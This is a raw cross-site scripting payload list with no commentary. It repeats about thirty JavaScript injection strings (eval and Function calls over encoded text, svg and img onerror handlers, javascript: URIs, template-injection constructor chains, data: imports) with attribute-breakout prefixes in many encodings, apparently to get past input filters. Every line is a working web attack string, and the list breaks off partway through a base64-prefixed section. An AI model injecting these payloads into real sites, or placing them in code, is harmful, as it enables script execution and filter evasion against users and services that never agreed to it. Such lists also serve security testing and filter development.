alert(1)
{alert(1)}
onerror=alert;throw 1
new Function`alert\`1\```
Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
eval(String.fromCharCode(97,108,101,114,116,40,49,41))
document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
import('data:,alert(1)')
setTimeout("alert(1)")
location=javascript:alert(1)
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
{{constructor.constructor('alert(1)')()}}
$.getScript('data:,alert(1)')
<a id=alert><a id=alert name=href>javascript:alert(1)
trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
navigator.serviceWorker.register('data:,alert(1)')
fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>       
Function("al"+"ert(1)")()
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
setTimeout("alert(1)",0)
<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
<svg/onload=alert(1)>
location="javascript:alert(1)"
document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")
"/>
"/>alert(1)
"/>{alert(1)}
"/>onerror=alert;throw 1
"/>new Function`alert\`1\```
"/>Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
"/>eval(String.fromCharCode(97,108,101,114,116,40,49,41))
"/>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
"/>document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
"/>import('data:,alert(1)')
"/>setTimeout("alert(1)")
"/>location=javascript:alert(1)
"/><svg/onload=alert(1)>
"/><img src=x onerror=alert(1)>
"/>{{constructor.constructor('alert(1)')()}}
"/>$.getScript('data:,alert(1)')
"/><a id=alert><a id=alert name=href>javascript:alert(1)
"/>trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
"/>navigator.serviceWorker.register('data:,alert(1)')
"/>fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
"/><script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
"/>Function("al"+"ert(1)")()
"/>Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
"/>eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
"/>setTimeout("alert(1)",0)
"/><img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
"/><svg/onload=alert(1)>
"/>location="javascript:alert(1)"
"/>document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

%22%2F%3E
%22%2F%3Ealert(1)
%22%2F%3E{alert(1)}
%22%2F%3Eonerror=alert;throw 1
%22%2F%3Enew Function`alert\`1\```
%22%2F%3EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
%22%2F%3Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
%22%2F%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%22%2F%3Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%22%2F%3Eimport('data:,alert(1)')
%22%2F%3EsetTimeout("alert(1)")
%22%2F%3Elocation=javascript:alert(1)
%22%2F%3E<svg/onload=alert(1)>
%22%2F%3E<img src=x onerror=alert(1)>
%22%2F%3E{{constructor.constructor('alert(1)')()}}
%22%2F%3E$.getScript('data:,alert(1)')
%22%2F%3E<a id=alert><a id=alert name=href>javascript:alert(1)
%22%2F%3EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%22%2F%3Enavigator.serviceWorker.register('data:,alert(1)')
%22%2F%3Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%22%2F%3E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%22%2F%3EFunction("al"+"ert(1)")()
%22%2F%3EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%22%2F%3Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%22%2F%3EsetTimeout("alert(1)",0)
%22%2F%3E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%22%2F%3E<svg/onload=alert(1)>
%22%2F%3Elocation="javascript:alert(1)"
%22%2F%3Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

%2522%252F%253E
%2522%252F%253Ealert(1)
%2522%252F%253E{alert(1)}
%2522%252F%253Eonerror=alert;throw 1
%2522%252F%253Enew Function`alert\`1\```
%2522%252F%253EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
%2522%252F%253Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
%2522%252F%253Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%2522%252F%253Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%2522%252F%253Eimport('data:,alert(1)')
%2522%252F%253EsetTimeout("alert(1)")
%2522%252F%253Elocation=javascript:alert(1)
%2522%252F%253E<svg/onload=alert(1)>
%2522%252F%253E<img src=x onerror=alert(1)>
%2522%252F%253E{{constructor.constructor('alert(1)')()}}
%2522%252F%253E$.getScript('data:,alert(1)')
%2522%252F%253E<a id=alert><a id=alert name=href>javascript:alert(1)
%2522%252F%253EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%2522%252F%253Enavigator.serviceWorker.register('data:,alert(1)')
%2522%252F%253Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%2522%252F%253E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%2522%252F%253EFunction("al"+"ert(1)")()
%2522%252F%253EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%2522%252F%253Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%2522%252F%253EsetTimeout("alert(1)",0)
%2522%252F%253E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%2522%252F%253E<svg/onload=alert(1)>
%2522%252F%253Elocation="javascript:alert(1)"
%2522%252F%253Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

%%32%32%%32%46%%33%45
%%32%32%%32%46%%33%45alert(1)
%%32%32%%32%46%%33%45{alert(1)}
%%32%32%%32%46%%33%45onerror=alert;throw 1
%%32%32%%32%46%%33%45new Function`alert\`1\```
%%32%32%%32%46%%33%45Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
%%32%32%%32%46%%33%45eval(String.fromCharCode(97,108,101,114,116,40,49,41))
%%32%32%%32%46%%33%45document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%%32%32%%32%46%%33%45document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%%32%32%%32%46%%33%45import('data:,alert(1)')
%%32%32%%32%46%%33%45setTimeout("alert(1)")
%%32%32%%32%46%%33%45location=javascript:alert(1)
%%32%32%%32%46%%33%45<svg/onload=alert(1)>
%%32%32%%32%46%%33%45<img src=x onerror=alert(1)>
%%32%32%%32%46%%33%45{{constructor.constructor('alert(1)')()}}
%%32%32%%32%46%%33%45$.getScript('data:,alert(1)')
%%32%32%%32%46%%33%45<a id=alert><a id=alert name=href>javascript:alert(1)
%%32%32%%32%46%%33%45trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%%32%32%%32%46%%33%45navigator.serviceWorker.register('data:,alert(1)')
%%32%32%%32%46%%33%45fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%%32%32%%32%46%%33%45<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%%32%32%%32%46%%33%45Function("al"+"ert(1)")()
%%32%32%%32%46%%33%45Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%%32%32%%32%46%%33%45eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%%32%32%%32%46%%33%45setTimeout("alert(1)",0)
%%32%32%%32%46%%33%45<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%%32%32%%32%46%%33%45<svg/onload=alert(1)>
%%32%32%%32%46%%33%45location="javascript:alert(1)"
%%32%32%%32%46%%33%45document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

%25%32%32%25%32%46%25%33%45
%25%32%32%25%32%46%25%33%45alert(1)
%25%32%32%25%32%46%25%33%45{alert(1)}
%25%32%32%25%32%46%25%33%45onerror=alert;throw 1
%25%32%32%25%32%46%25%33%45new Function`alert\`1\```
%25%32%32%25%32%46%25%33%45Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
%25%32%32%25%32%46%25%33%45eval(String.fromCharCode(97,108,101,114,116,40,49,41))
%25%32%32%25%32%46%25%33%45document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%25%32%32%25%32%46%25%33%45document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%25%32%32%25%32%46%25%33%45import('data:,alert(1)')
%25%32%32%25%32%46%25%33%45setTimeout("alert(1)")
%25%32%32%25%32%46%25%33%45location=javascript:alert(1)
%25%32%32%25%32%46%25%33%45<svg/onload=alert(1)>
%25%32%32%25%32%46%25%33%45<img src=x onerror=alert(1)>
%25%32%32%25%32%46%25%33%45{{constructor.constructor('alert(1)')()}}
%25%32%32%25%32%46%25%33%45$.getScript('data:,alert(1)')
%25%32%32%25%32%46%25%33%45<a id=alert><a id=alert name=href>javascript:alert(1)
%25%32%32%25%32%46%25%33%45trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%25%32%32%25%32%46%25%33%45navigator.serviceWorker.register('data:,alert(1)')
%25%32%32%25%32%46%25%33%45fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%25%32%32%25%32%46%25%33%45<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%25%32%32%25%32%46%25%33%45Function("al"+"ert(1)")()
%25%32%32%25%32%46%25%33%45Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%25%32%32%25%32%46%25%33%45eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%25%32%32%25%32%46%25%33%45setTimeout("alert(1)",0)
%25%32%32%25%32%46%25%33%45<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%25%32%32%25%32%46%25%33%45<svg/onload=alert(1)>
%25%32%32%25%32%46%25%33%45location="javascript:alert(1)"
%25%32%32%25%32%46%25%33%45document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

&quote;/&gt;
&quote;/&gt;alert(1)
&quote;/&gt;{alert(1)}
&quote;/&gt;onerror=alert;throw 1
&quote;/&gt;new Function`alert\`1\```
&quote;/&gt;Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
&quote;/&gt;eval(String.fromCharCode(97,108,101,114,116,40,49,41))
&quote;/&gt;document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
&quote;/&gt;document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
&quote;/&gt;import('data:,alert(1)')
&quote;/&gt;setTimeout("alert(1)")
&quote;/&gt;location=javascript:alert(1)
&quote;/&gt;<svg/onload=alert(1)>
&quote;/&gt;<img src=x onerror=alert(1)>
&quote;/&gt;{{constructor.constructor('alert(1)')()}}
&quote;/&gt;$.getScript('data:,alert(1)')
&quote;/&gt;<a id=alert><a id=alert name=href>javascript:alert(1)
&quote;/&gt;trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
&quote;/&gt;navigator.serviceWorker.register('data:,alert(1)')
&quote;/&gt;fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
&quote;/&gt;<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
&quote;/&gt;Function("al"+"ert(1)")()
&quote;/&gt;Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
&quote;/&gt;eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
&quote;/&gt;setTimeout("alert(1)",0)
&quote;/&gt;<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
&quote;/&gt;<svg/onload=alert(1)>
&quote;/&gt;location="javascript:alert(1)"
&quote;/&gt;document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

&amp;quot;/&amp;gt;
&amp;quot;/&amp;gt;alert(1)
&amp;quot;/&amp;gt;{alert(1)}
&amp;quot;/&amp;gt;onerror=alert;throw 1
&amp;quot;/&amp;gt;new Function`alert\`1\```
&amp;quot;/&amp;gt;Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
&amp;quot;/&amp;gt;eval(String.fromCharCode(97,108,101,114,116,40,49,41))
&amp;quot;/&amp;gt;document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
&amp;quot;/&amp;gt;document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
&amp;quot;/&amp;gt;import('data:,alert(1)')
&amp;quot;/&amp;gt;setTimeout("alert(1)")
&amp;quot;/&amp;gt;location=javascript:alert(1)
&amp;quot;/&amp;gt;<svg/onload=alert(1)>
&amp;quot;/&amp;gt;<img src=x onerror=alert(1)>
&amp;quot;/&amp;gt;{{constructor.constructor('alert(1)')()}}
&amp;quot;/&amp;gt;$.getScript('data:,alert(1)')
&amp;quot;/&amp;gt;<a id=alert><a id=alert name=href>javascript:alert(1)
&amp;quot;/&amp;gt;trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
&amp;quot;/&amp;gt;navigator.serviceWorker.register('data:,alert(1)')
&amp;quot;/&amp;gt;fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
&amp;quot;/&amp;gt;<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
&amp;quot;/&amp;gt;Function("al"+"ert(1)")()
&amp;quot;/&amp;gt;Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
&amp;quot;/&amp;gt;eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
&amp;quot;/&amp;gt;setTimeout("alert(1)",0)
&amp;quot;/&amp;gt;<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
&amp;quot;/&amp;gt;<svg/onload=alert(1)>
&amp;quot;/&amp;gt;location="javascript:alert(1)"
&amp;quot;/&amp;gt;document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

&#34;&#47;&#62;
&#34;&#47;&#62;alert(1)
&#34;&#47;&#62;{alert(1)}
&#34;&#47;&#62;onerror=alert;throw 1
&#34;&#47;&#62;new Function`alert\`1\```
&#34;&#47;&#62;Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
&#34;&#47;&#62;eval(String.fromCharCode(97,108,101,114,116,40,49,41))
&#34;&#47;&#62;document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
&#34;&#47;&#62;document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
&#34;&#47;&#62;import('data:,alert(1)')
&#34;&#47;&#62;setTimeout("alert(1)")
&#34;&#47;&#62;location=javascript:alert(1)
&#34;&#47;&#62;<svg/onload=alert(1)>
&#34;&#47;&#62;<img src=x onerror=alert(1)>
&#34;&#47;&#62;{{constructor.constructor('alert(1)')()}}
&#34;&#47;&#62;$.getScript('data:,alert(1)')
&#34;&#47;&#62;<a id=alert><a id=alert name=href>javascript:alert(1)
&#34;&#47;&#62;trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
&#34;&#47;&#62;navigator.serviceWorker.register('data:,alert(1)')
&#34;&#47;&#62;fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
&#34;&#47;&#62;<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
&#34;&#47;&#62;Function("al"+"ert(1)")()
&#34;&#47;&#62;Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
&#34;&#47;&#62;eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
&#34;&#47;&#62;setTimeout("alert(1)",0)
&#34;&#47;&#62;<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
&#34;&#47;&#62;<svg/onload=alert(1)>
&#34;&#47;&#62;location="javascript:alert(1)"
&#34;&#47;&#62;document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

&#x22;&#x2F;&#x3E
&#x22;&#x2F;&#x3E;alert(1)
&#x22;&#x2F;&#x3E;{alert(1)}
&#x22;&#x2F;&#x3E;onerror=alert;throw 1
&#x22;&#x2F;&#x3E;new Function`alert\`1\```
&#x22;&#x2F;&#x3E;Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
&#x22;&#x2F;&#x3E;eval(String.fromCharCode(97,108,101,114,116,40,49,41))
&#x22;&#x2F;&#x3E;document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
&#x22;&#x2F;&#x3E;document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
&#x22;&#x2F;&#x3E;import('data:,alert(1)')
&#x22;&#x2F;&#x3E;setTimeout("alert(1)")
&#x22;&#x2F;&#x3E;location=javascript:alert(1)
&#x22;&#x2F;&#x3E;<svg/onload=alert(1)>
&#x22;&#x2F;&#x3E;<img src=x onerror=alert(1)>
&#x22;&#x2F;&#x3E;{{constructor.constructor('alert(1)')()}}
&#x22;&#x2F;&#x3E;$.getScript('data:,alert(1)')
&#x22;&#x2F;&#x3E;<a id=alert><a id=alert name=href>javascript:alert(1)
&#x22;&#x2F;&#x3E;trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
&#x22;&#x2F;&#x3E;navigator.serviceWorker.register('data:,alert(1)')
&#x22;&#x2F;&#x3E;fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
&#x22;&#x2F;&#x3E;<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
&#x22;&#x2F;&#x3E;Function("al"+"ert(1)")()
&#x22;&#x2F;&#x3E;Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
&#x22;&#x2F;&#x3E;eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
&#x22;&#x2F;&#x3E;setTimeout("alert(1)",0)
&#x22;&#x2F;&#x3E;<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
&#x22;&#x2F;&#x3E;<svg/onload=alert(1)>
&#x22;&#x2F;&#x3E;location="javascript:alert(1)"
&#x22;&#x2F;&#x3E;document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

\u0022\u002F\u003E
\u0022\u002F\u003Ealert(1)
\u0022\u002F\u003E{alert(1)}
\u0022\u002F\u003Eonerror=alert;throw 1
\u0022\u002F\u003Enew Function`alert\`1\```
\u0022\u002F\u003EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
\u0022\u002F\u003Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
\u0022\u002F\u003Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
\u0022\u002F\u003Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
\u0022\u002F\u003Eimport('data:,alert(1)')
\u0022\u002F\u003EsetTimeout("alert(1)")
\u0022\u002F\u003Elocation=javascript:alert(1)
\u0022\u002F\u003E<svg/onload=alert(1)>
\u0022\u002F\u003E<img src=x onerror=alert(1)>
\u0022\u002F\u003E{{constructor.constructor('alert(1)')()}}
\u0022\u002F\u003E$.getScript('data:,alert(1)')
\u0022\u002F\u003E<a id=alert><a id=alert name=href>javascript:alert(1)
\u0022\u002F\u003EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
\u0022\u002F\u003Enavigator.serviceWorker.register('data:,alert(1)')
\u0022\u002F\u003Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
\u0022\u002F\u003E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
\u0022\u002F\u003EFunction("al"+"ert(1)")()
\u0022\u002F\u003EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
\u0022\u002F\u003Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
\u0022\u002F\u003EsetTimeout("alert(1)",0)
\u0022\u002F\u003E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
\u0022\u002F\u003E<svg/onload=alert(1)>
\u0022\u002F\u003Elocation="javascript:alert(1)"
\u0022\u002F\u003Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")
\U00000022\U0000002F\U0000003E
\U00000022\U0000002F\U0000003Ealert(1)
\U00000022\U0000002F\U0000003E{alert(1)}
\U00000022\U0000002F\U0000003Eonerror=alert;throw 1
\U00000022\U0000002F\U0000003Enew Function`alert\`1\```
\U00000022\U0000002F\U0000003EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
\U00000022\U0000002F\U0000003Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
\U00000022\U0000002F\U0000003Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
\U00000022\U0000002F\U0000003Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
\U00000022\U0000002F\U0000003Eimport('data:,alert(1)')
\U00000022\U0000002F\U0000003EsetTimeout("alert(1)")
\U00000022\U0000002F\U0000003Elocation=javascript:alert(1)
\U00000022\U0000002F\U0000003E<svg/onload=alert(1)>
\U00000022\U0000002F\U0000003E<img src=x onerror=alert(1)>
\U00000022\U0000002F\U0000003E{{constructor.constructor('alert(1)')()}}
\U00000022\U0000002F\U0000003E$.getScript('data:,alert(1)')
\U00000022\U0000002F\U0000003E<a id=alert><a id=alert name=href>javascript:alert(1)
\U00000022\U0000002F\U0000003EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
\U00000022\U0000002F\U0000003Enavigator.serviceWorker.register('data:,alert(1)')
\U00000022\U0000002F\U0000003Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
\U00000022\U0000002F\U0000003E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
\U00000022\U0000002F\U0000003EFunction("al"+"ert(1)")()
\U00000022\U0000002F\U0000003EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
\U00000022\U0000002F\U0000003Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
\U00000022\U0000002F\U0000003EsetTimeout("alert(1)",0)
\U00000022\U0000002F\U0000003E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
\U00000022\U0000002F\U0000003E<svg/onload=alert(1)>
\U00000022\U0000002F\U0000003Elocation="javascript:alert(1)"
\U00000022\U0000002F\U0000003Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

%u0022%u002F%u003E
%u0022%u002F%u003Ealert(1)
%u0022%u002F%u003E{alert(1)}
%u0022%u002F%u003Eonerror=alert;throw 1
%u0022%u002F%u003Enew Function`alert\`1\```
%u0022%u002F%u003EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
%u0022%u002F%u003Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
%u0022%u002F%u003Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%u0022%u002F%u003Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%u0022%u002F%u003Eimport('data:,alert(1)')
%u0022%u002F%u003EsetTimeout("alert(1)")
%u0022%u002F%u003Elocation=javascript:alert(1)
%u0022%u002F%u003E<svg/onload=alert(1)>
%u0022%u002F%u003E<img src=x onerror=alert(1)>
%u0022%u002F%u003E{{constructor.constructor('alert(1)')()}}
%u0022%u002F%u003E$.getScript('data:,alert(1)')
%u0022%u002F%u003E<a id=alert><a id=alert name=href>javascript:alert(1)
%u0022%u002F%u003EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%u0022%u002F%u003Enavigator.serviceWorker.register('data:,alert(1)')
%u0022%u002F%u003Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%u0022%u002F%u003E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%u0022%u002F%u003EFunction("al"+"ert(1)")()
%u0022%u002F%u003EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%u0022%u002F%u003Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%u0022%u002F%u003EsetTimeout("alert(1)",0)
%u0022%u002F%u003E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%u0022%u002F%u003E<svg/onload=alert(1)>
%u0022%u002F%u003Elocation="javascript:alert(1)"
%u0022%u002F%u003Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

%U00000022%U0000002F%U0000003E
%U00000022%U0000002F%U0000003Ealert(1)
%U00000022%U0000002F%U0000003E{alert(1)}
%U00000022%U0000002F%U0000003Eonerror=alert;throw 1
%U00000022%U0000002F%U0000003Enew Function`alert\`1\```
%U00000022%U0000002F%U0000003EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
%U00000022%U0000002F%U0000003Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
%U00000022%U0000002F%U0000003Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%U00000022%U0000002F%U0000003Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%U00000022%U0000002F%U0000003Eimport('data:,alert(1)')
%U00000022%U0000002F%U0000003EsetTimeout("alert(1)")
%U00000022%U0000002F%U0000003Elocation=javascript:alert(1)
%U00000022%U0000002F%U0000003E<svg/onload=alert(1)>
%U00000022%U0000002F%U0000003E<img src=x onerror=alert(1)>
%U00000022%U0000002F%U0000003E{{constructor.constructor('alert(1)')()}}
%U00000022%U0000002F%U0000003E$.getScript('data:,alert(1)')
%U00000022%U0000002F%U0000003E<a id=alert><a id=alert name=href>javascript:alert(1)
%U00000022%U0000002F%U0000003EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%U00000022%U0000002F%U0000003Enavigator.serviceWorker.register('data:,alert(1)')
%U00000022%U0000002F%U0000003Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%U00000022%U0000002F%U0000003E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%U00000022%U0000002F%U0000003EFunction("al"+"ert(1)")()
%U00000022%U0000002F%U0000003EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%U00000022%U0000002F%U0000003Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%U00000022%U0000002F%U0000003EsetTimeout("alert(1)",0)
%U00000022%U0000002F%U0000003E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%U00000022%U0000002F%U0000003E<svg/onload=alert(1)>
%U00000022%U0000002F%U0000003Elocation="javascript:alert(1)"
%U00000022%U0000002F%U0000003Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

Ii8+
Ii8+alert(1)
Ii8+{alert(1)}
Ii8+onerror=alert;throw 1
Ii8+new Function`alert\`1\```
Ii8+Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
Ii8+eval(String.fromCharCode(97,108,101,114,116,40,49,41))
Ii8+document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
